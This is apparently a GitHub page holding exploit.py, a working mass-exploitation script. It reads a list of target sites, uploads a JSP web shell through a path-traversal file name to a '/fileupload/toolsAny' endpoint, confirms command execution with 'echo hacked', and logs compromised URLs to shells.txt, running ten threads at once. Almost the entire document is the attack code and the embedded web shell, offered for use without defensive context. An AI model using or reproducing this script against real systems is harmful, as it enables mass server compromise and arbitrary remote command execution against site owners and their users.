-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
48 lines (41 loc) · 1.62 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import requests, urllib3, sys
from concurrent.futures import ThreadPoolExecutor
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
urllib3.disable_warnings()
ins = input("ENter List: ")
fiels = open(ins, 'r')
fiels = fiels.readlines()
final = [r.rstrip() for r in fiels]
def exploit(site):
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
file_name = "cmd.jsp"
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file_name}": shell}
endpoint = "authenticationendpoint/cmd.jsp"
response = requests.post(site+'/fileupload/toolsAny', files=files, verify=False)
resp = requests.get(site+"/authenticationendpoint/cmd.jsp?cmd=echo hacked", verify=False)
if "hacked" in resp.text and resp.status_code == 200:
print("shell uploaded: "+resp.url)
filess = open("shells.txt", 'a')
filess = filess.write(resp.url+"\n")
else:
print("not vulN: "+site)
with ThreadPoolExecutor(10) as Executor:
Executor.map(exploit, final)